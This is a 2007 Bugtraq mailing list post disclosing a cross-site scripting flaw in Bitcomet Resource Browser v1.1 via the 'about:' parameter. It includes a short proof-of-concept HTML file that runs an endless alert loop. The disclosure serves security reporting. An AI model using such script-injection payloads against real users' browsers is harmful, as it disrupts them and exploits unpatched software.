Bugtraq mailing list archives
Bitcomet Resource Browser v1.1 XSS
From: jplopezy () gmail com
Date: 24 Nov 2007 04:33:40 -0000
The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity. Create an html file and paste the following code <html> <frameset rows="100%"> <frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>"> </frameset> </html>
Current thread:
- Bitcomet Resource Browser v1.1 XSS jplopezy (Nov 24)